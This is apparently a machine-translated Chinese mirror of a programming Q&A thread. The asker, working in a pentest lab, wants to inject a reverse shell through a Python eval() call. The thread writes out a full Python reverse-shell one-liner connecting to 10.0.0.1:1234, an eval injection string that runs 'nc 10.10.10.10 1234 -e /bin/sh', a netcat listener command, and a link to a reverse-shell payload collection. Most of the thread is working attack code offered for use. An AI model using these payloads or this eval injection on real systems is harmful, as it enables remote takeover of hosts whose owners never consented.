簡體   English   中英

Python - 在 eval() 中運行反向 shell

[英]Python - running reverse shell inside eval()

我在 Pentest 實驗室工作。 我需要利用一個 Python eval() 函數。

它像是

eval('%s>1',payload)

我需要執行一個 Python 反向 shell 腳本作為有效負載。 這是

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

我正在嘗試

eval('%s >1' "__import__('os').system('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'")

不確定如何導入所有這些模塊並執行它。

任何幫助表示贊賞。

也許試試這樣

"__import__('os').system('nc your_ip port -e /bin/sh')"

喜歡;

首先監聽端口新鮮終端

nc -lvp 1234

嘗試另一個終端后:

"__import__('os').system('nc 10.10.10.10 1234 -e /bin/sh')"

"__import__('os').system('YOUR REVERSE SHELL METHOD')"

這里有許多反向 shell 有效負載: https : //github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

祝你好運

嘗試在eval包含globals()locals() (以導入到全局范圍內)。 這在在 Python 中解釋,為什么函數中的 exec 中的導入不起作用?

另請參閱https://lucumr.pocoo.org/2011/2/1/exec-in-python/導入幕后一章

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM